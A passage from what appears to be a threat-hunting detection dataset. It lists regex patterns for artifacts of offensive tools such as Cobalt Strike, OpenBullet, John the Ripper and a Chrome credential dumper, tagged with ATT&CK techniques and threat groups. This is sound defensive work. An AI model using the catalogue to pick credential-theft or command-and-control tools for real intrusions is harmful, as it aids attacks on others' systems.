T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice 
Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53939" "*openBeaconConsole*",".{0,1000}openBeaconConsole.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","53940" 
"*openBeaconConsole*",".{0,1000}openBeaconConsole.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53941" "*openbsd_softraid2john.py*",".{0,1000}openbsd_softraid2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53942" "*OpenBullet.csproj*",".{0,1000}OpenBullet\.csproj.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53943" "*OpenBullet.exe*",".{0,1000}OpenBullet\.exe.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53944" "*OpenBullet.pdb*",".{0,1000}OpenBullet\.pdb.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53945" "*OpenBullet.sln*",".{0,1000}OpenBullet\.sln.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53946" "*OpenBullet.zip*",".{0,1000}OpenBullet\.zip.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability 
Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53947" "*openbullet/openbullet*",".{0,1000}openbullet\/openbullet.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53948" "*OpenBullet2.Console.zip*",".{0,1000}OpenBullet2\.Console\.zip.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","1","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","53949" "*OpenBullet2.Native.exe*",".{0,1000}OpenBullet2\.Native\.exe.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","1","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","53950" "*OpenBullet2.Native.zip*",".{0,1000}OpenBullet2\.Native\.zip.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","1","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","53951" "*OpenBullet2.zip*",".{0,1000}OpenBullet2\.zip.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - 
TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","1","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","53952" "*openbullet2:latest*",".{0,1000}openbullet2\:latest.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","0","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","53953" "*OpenBullet2-master*",".{0,1000}OpenBullet2\-master.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","1","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","53954" "*OpenBulletApp.cs*",".{0,1000}OpenBulletApp\.cs.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53955" "*OpenBulletCLI.csproj*",".{0,1000}OpenBulletCLI\.csproj.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53956" "*OpenBulletCLI.exe*",".{0,1000}OpenBulletCLI\.exe.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - 
TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53957" "*openbullet-master*",".{0,1000}openbullet\-master.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","1","N/A","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","53958" "*openBypassUACDialog*",".{0,1000}openBypassUACDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 
XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","53959" "*openBypassUACDialog*",".{0,1000}openBypassUACDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53960" "*openChromeDumpsHTML.exe*",".{0,1000}openChromeDumpsHTML\.exe.{0,1000}","offensive_tool_keyword","OpenChromeDumps","OpenChrome Dump used with GrabChrome for credential access","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Yanluowang - Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53961" "*opencubicles/h8mail*",".{0,1000}opencubicles\/h8mail.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Reconnaissance","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","N/A","1","11","4","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z","53962" "*OPENCYBER-FR/RustHound*",".{0,1000}OPENCYBER\-FR\/RustHound.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","53963" "*openGoldenTicketDialog*",".{0,1000}openGoldenTicketDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53964" "*Opening PSEXEC shell at *",".{0,1000}Opening\sPSEXEC\sshell\sat\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","53965" "*openKeystrokeBrowser*",".{0,1000}openKeystrokeBrowser.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 
- T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53966" "*openPayloadGenerator*",".{0,1000}openPayloadGenerator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","53967" "*openPayloadGeneratorDialog*",".{0,1000}openPayloadGeneratorDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - 
Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53968" "*openPayloadHelper*",".{0,1000}openPayloadHelper.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - 
NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53969" "*openPortScanner*",".{0,1000}openPortScanner.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","53970" "*openPortScanner*",".{0,1000}openPortScanner.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 